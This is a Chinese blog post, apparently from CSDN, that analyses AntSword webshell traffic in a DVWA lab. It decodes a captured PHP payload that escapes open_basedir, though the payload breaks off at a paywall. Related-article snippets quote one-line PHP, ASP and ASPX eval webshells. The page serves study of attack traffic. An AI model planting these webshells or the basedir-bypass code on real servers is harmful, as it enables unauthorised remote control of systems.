中国蚁剑的工作原理

原创 已于 2023-01-12 14:02:53 修改 · 2.6k 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#中国蚁剑

于 2023-01-12 13:50:56 首次发布
文章详细解析了一段PHP后门代码,首先介绍了如何使用蚁剑进行连接,并通过Wireshark捕获网络流量。接着,对代码进行了逐行解释,涉及@ini_set、set_time_limit等函数,以及文件系统操作和权限绕过。最后,展示了如何读取并执行远程文件,揭示了黑客可能的攻击手段。

  1. 中国蚁剑连接http://192.168.11.157/dvwa/hackable/uploads/pass.php

  1. 蚁剑连接并同时用wireshark抓取流量

  1. 1274 行,追踪tcp流

  1. 因为我们的php.php内容是 $_POST['pass'],所以这里是post了一个pass参数,后面跟上了命令。通过站长工具-URL解码/编码 (wetimer.com)url解码、PHP格式化,在线美化PHP代码-站长工具 (senlt.cn)看一下:

@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
    $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
    @array_push($oparr,$ocwd,sys_get_temp_dir());
    foreach($oparr as $item) {
        if(!@is_writable($item)) {
            continue;
        };
        $tmdir=$item."/.4044a0d3a48";
        @mkdir($tmdir);
        if(!@file_exists($tmdir)) {
            continue;
        }
        $tmdir=realpath($tmdir);
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr=@preg_split("/\\\\|\//",$tmdir);
        for ($i=0;$i<
最低0.47元/天 解锁文章
中国源码antSword-2.1.9.zip
09-17
中国(AntSword)是一款开源的安全工具,主要用于网络安全测试和Web应用的渗透测试。在本案例中,我们讨论的是其2.1.9版本的源码。这个压缩包"antSword-2.1.9.zip"包含了项目在该版本的所有源代码,用户可以...
中国2.1.9_内含源码和加载器.rar
11-19
中国是一款开源的Web渗透测试工具,以其高效、便捷的操作方式受到许多网络安全专业人士的青睐。版本2.1.9是该工具的一个迭代更新,它提供了更多的功能和优化,以帮助用户更好地进行网站的安全测试。加载器v4.0.3...
中国-antSword
lin__ying的博客
12-28 1955
是一款开源的跨平台Webshell管理工具,它是一个开源的远程管理工具,主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。提供了一个图形化界面,可以通过简单的操作连接和控制目标设备或系统。具有以下特点:1.支持多种操作系统:支持多种操作系统,包括Windows、Linux、MacOS等,因此具有很好的跨平台性能。2.功能丰富:具有文件管理器、进程管理器、主机信息查看器、端口转发等多种功能,为用户提供了全面的远程管理服务。
工作机制分析与改造
weixin_49793875的博客
11-02 763
总体从四个角度了解工作机制发送的payload解码器编码器请求包中的所有参数。
的使用之的核心思想
qq_50953689的博客
05-05 4869
分析 PHP 一句话木马的原理: php的一句话木马: <?php @eval($_POST['pass']);?> asp的一句话木马是: <%eval request ("pass")%> aspx的一句话木马是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> 总结:通过连接一句话木马,每个功能操作,都是通过 POST 方式传递不同的执行代
从入门到魔改【二】· 编解码器原理及改造
buffedon的博客
12-25 3349
编解码器原理编解码器原理一、编码器编码器修改二、解码器 编解码器原理 编码器:对发送流量进行编码,服务端进行解码 解码器:对服务端对返回的流量进行解码 一、编码器 输入三个参数 pwd:连接密码,类型string。 data:传输的数据数组,类型string数组,。 ext:一些扩展选项,在一些场景可能会用到。 输出一个参数 data: 编码器处理后的数组,这个你可以通过代理查看post提交了哪些数据,和这里的data是完全一样的 下面是编码器默认生成的代码 原理:将编码和解密后的代码 全都
wireshark网络分析就这么简单_从wireshark了解工作原理
weixin_39685697的博客
12-10 1467
继续转发我的csdn......早上看到朋友们聊能连jsp的,我就顺便回忆了一下工作原理。突然发现,以前看过好几遍的分析文章,脑子都骗了我,告诉我它记住了。还是要自己动手分析一下,不然脑子总是欺骗我。1. 我已经在本地搭建好了环境,并放入了一句话马。2. 连接并同时用wireshark抓取流量。3.追踪tcp流:4.往下翻一翻,发现了:5.因为我们的一句话是$_POST[‘...
中国源码antsword.zip
08-07
中国】,全称为"中国源码antsword.zip",是一款备受瞩目的开源网站管理工具,尤其在安全领域中具有广泛的应用。它以其跨平台的特性,为合法的渗透测试专家和网站管理员提供了高效、便捷的Webshell管理解决...
精选资源
中国的资源文件 answord-master
08-14
中国,又名AntSword,是一款开源的WebShell管理工具,主要应用于网络安全领域,尤其是网站渗透测试和安全审计。这款工具以其简洁的界面、强大的功能和便捷的操作性受到许多安全研究人员的喜爱。"answord-master...
和webshell的基础学习
JasonCian的博客
12-07 4522
文件上传漏洞 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。 这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。 如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 文件上传漏洞本身就是一个危害巨大的漏洞,WebShell更是将这种漏洞的利用无限扩大。 大多数的上传漏洞被利用后攻.
中国(antSword-master.zip
08-23
用于链接一句话木马
中国AntSword
04-07
中国AntSword
的使用
最新发布
2301_80413992的博客
11-15 2935
将文件后缀改为.php即可(在创建此文件过程中可能会被电脑杀毒软件查杀,建议先关闭电脑的杀毒软件)一台虚拟机作为服务器,一台作为攻击机(可用主机),将虚拟机的网络都设置为桥接。还可以右键选择打开终端,输入命令,不过能够用什么命令还得看你有什么权限。输入URL,连接密码以及编码设置,PHP语言推荐编辑器使用chr加密。Php的一句话木马很简单,就是创建一个文本,写入。编码器很重要,一定要慎重选择,默认就是明文传输。2.有一个插件市场,可以下载各种插件。123就是你用来控制的密码,可以随便取。
mw_myever的博客
10-04 5380
一、介绍 中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 就我个人而言:中华是一款界面整洁,且比菜刀还好用的的shell控制端软件 二、中华的下载 不多废话直接上链接 网盘链接: 点我提取 提取码:mw13 github链接: 源码 核心加载器 三、安装 下载好以后将两个压缩包放到对应的文件夹里 ...
的分析和利用
qq_53058639的博客
02-19 664
这篇文章主要是以虚拟终端模块执行命令功能为例,逐步分析,并通过分析结果优化对应脚本的方法。
安装以及使用方法
热门推荐
qq_45951598的博客
09-14 2万+
一、如何安装 安装分两个步骤一个是下载源代码,还有一个加载器,用加载器去加载源代码,下载的的文件路径一定要记得 源码下载:https://github.com/AntSwordProject/antSword 加载器下载:https://github.com/AntSwordProject/AntSword-Loader 下载之后解压缩之后是这样的 点击AntSword-Loader-v4.0.3-win32-x64这个文件打开AntSword.exe 点击初始化 点击初始化点击选
【木马终端】————1、中国的使用与功能介绍
Fly_鹏程万里
08-08 1万+
前言 说起webshell终端管理工具大多数人都会说“中国菜刀”,确实“中国菜刀”伴随着我们一起在网络安全道路上走了好久好久,它算的上是webshell终端管理工具的“启蒙导师”。今天给大家要介绍的是一个功能更加强大而且好用的webshell终端管理工具——中国。 下载 中国的项目地址:https://github.com/AntSwordProject/antSword ...
操作手册
weixin_44820552的博客
03-27 4467
(AntSword)是一款开源的跨平台WebShell管理工具,将一句话木马上传到被测平台,通过进行连接获取被测平台的服务器webshell。
的相关使用以及流量分析
weixin_64446233的博客
11-04 1078
主要讲述的基本使用以及相关的流量分析
2.1.9版本源码下载指南
通过以上知识点的梳理,可以对“中国源码antSword-2.1.9.zip”有一个全面的认识,它不仅是一个版本号,还代表了在Web安全领域的应用价值,源码的重要性以及与Git版本控制的结合使用等技术细节。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值